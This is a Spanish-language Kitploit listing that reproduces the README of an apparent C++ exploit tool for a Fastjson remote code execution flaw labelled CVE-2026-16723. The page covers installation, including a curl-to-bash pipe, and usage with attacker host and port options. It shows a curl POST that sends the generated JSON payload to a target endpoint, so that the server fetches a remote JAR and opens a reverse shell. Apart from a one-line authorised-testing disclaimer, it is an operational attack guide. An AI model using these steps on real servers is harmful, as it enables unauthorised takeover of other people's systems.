Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-16723 — Exploit para Fastjson RCE (CVE-2026-16723) dirigido a las versiones 1.2.68 a 1.2.83. Genera payloads JAR y JSON, aloja un servidor HTTP y establece una reverse shell. | Kitploit
Herramientas/GitHubGitHub/nowafen/cve-2026-16723
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubnowafen/cve-2026-16723

CVE-2026-16723

Exploit para Fastjson RCE (CVE-2026-16723) dirigido a las versiones 1.2.68 a 1.2.83. Genera payloads JAR y JSON, aloja un servidor HTTP y establece una reverse shell.

Ver Repositorio
2hace 3 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit CVE-2026-16723

Una implementación independiente en C++17 para CVE-2026-16723, una vulnerabilidad crítica que afecta a Fastjson versiones 1.2.68 – 1.2.83.

Requisitos

  • Linux (o WSL en Windows)

  • Compilador compatible con C++17 (GCC 7+ o Clang 5+)

  • CMake 3.10 o superior

  • Paquetes del sistema:

    • libzip-dev
    • zlib1g-dev

Debian / Ubuntu

root@kitploit:~
sudo apt update
sudo apt install -y build-essential cmake libzip-dev zlib1g-dev

Instalación

Instalación rápida (recomendada)

Instala todo con un solo comando:

root@kitploit:~
curl -sSL https://raw.githubusercontent.com/yourusername/CVE-2026-16723/main/install.sh | bash

O descarga y ejecuta el instalador manualmente:

root@kitploit:~
wget https://raw.githubusercontent.com/yourusername/CVE-2026-16723/main/install.sh
chmod +x install.sh
./install.sh

El script de instalación hará lo siguiente:

  • Instalar todos los paquetes del sistema requeridos.

  • Descargar las librerías de solo cabecera requeridas:

    • nlohmann/json
    • cpp-httplib
  • Compilar el proyecto.

  • Colocar el binario compilado en el directorio actual como:

root@kitploit:~
./exploit

Compilación manual

Si has clonado el repositorio:

root@kitploit:~
git clone https://github.com/yourusername/CVE-2026-16723.git
cd CVE-2026-16723
./install.sh

O compila manualmente:

root@kitploit:~
mkdir build
cd build

cmake ..
make -j$(nproc)

cp exploit ../

Uso

Ejecuta el binario:

root@kitploit:~
./exploit --lhost <YOUR_IP> --lport <SHELL_PORT> [options]

Ejemplo

root@kitploit:~
./exploit --lhost 192.168.1.100 --lport 4444 --http-port 8000

Después de la ejecución se crearán los siguientes archivos:

root@kitploit:~
x
body.json

El servidor HTTP se iniciará en el puerto configurado (por defecto: 8000) y la herramienta esperará una conexión de reverse shell entrante.


Envío del Payload

Envía el archivo body.json generado al endpoint vulnerable:

root@kitploit:~
curl -X POST http://<TARGET_IP>:8080/api/products/search \
     -H "Content-Type: application/json" \
     --data-binary @body.json

Si la aplicación espera un campo JSON diferente, especifícalo usando la opción --field.


Opciones de línea de comandos


Archivos de salida

ArchivoDescripción
xPayload JAR generado
body.jsonPayload JSON para enviar al objetivo

Notas

  • Este proyecto está destinado únicamente a pruebas de seguridad autorizadas y fines educativos.
  • La implementación obliga a la aplicación objetivo a descargar y cargar un JAR remoto usando los protocolos jar:http y jar:file.
  • El comando del reverse shell está codificado en Base64 para reducir problemas de escape.

Sígueme en Twitter (X)

  • MNM
Descargar herramienta
OpciónDescripciónPor defecto
--lhostDirección IP localRequerido
--lportPuerto de escucha para el reverse shell4444
--http-portPuerto del servidor HTTP8000
--firstPrimer descriptor de archivo a probar3
--lastÚltimo descriptor de archivo a probar30
--fieldNombre del campo JSONfacets
--outdirDirectorio de salida.
-h, --helpMostrar mensaje de ayuda—